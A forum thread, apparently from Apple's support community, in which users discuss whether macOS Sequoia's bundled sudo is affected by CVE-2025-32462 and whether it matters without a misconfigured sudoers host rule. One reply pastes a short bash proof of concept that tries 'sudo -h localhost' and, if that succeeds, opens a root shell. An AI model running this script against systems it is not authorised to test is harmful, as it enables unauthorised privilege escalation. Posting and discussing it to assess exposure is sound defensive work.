Trying to find out when Apple will release a security update to Sequoia for this sudo vulnerability.
Sudo is subject to this vulnerability from version 1.8.8 thru 1.9.17 - Sequoia appears to have sudo version 1.9.13 included.
Trying to find out when Apple will release a security update to Sequoia for this sudo vulnerability.
You'd have to ask Apple.
Unless you’ve altered your sodoers file adding a host option, it is irrelevant.
MrHoffman wrote:
Here is what is purportedly the proof of concept (POC) for this vulnerability.
https://github.com/cyberpoul/CVE-2025-32462-POC
There is a crucial part of the exploit that you're missing here.
In order to be vulnerable, the sudo configuration must be misconfigured to begin with.
They helpfully provide an example of a misconfiguration, but visudo refused to accept it.
The "security" circus continues...
Technically, the current version of macOS 15.6 has version 1.9.13p2 of sudo which could indicate patch 2? But to be sure, as Barney suggested, you'd have to ask Apple.
Here is what is purportedly the proof of concept (POC) for this vulnerability.
https://github.com/cyberpoul/CVE-2025-32462-POC
Try it:
#!/bin/bash
# CVE-2025-32462 – sudo -h privilege escalation PoC
# by opscur
echo "[+] Testing for CVE-2025-32462 bypass via 'sudo -h'..."
CMD=${1:-id}
if sudo -h localhost $CMD 2>/dev/null | grep -q "uid=0(root)"; then
echo "[!] Success: Root access granted!"
sudo -h localhost /bin/bash -p
else
echo "[-] Target not vulnerable or sudoers configuration not exploitable."
fi
macOS 15.6 sudo vulnerability CVE-2025-32462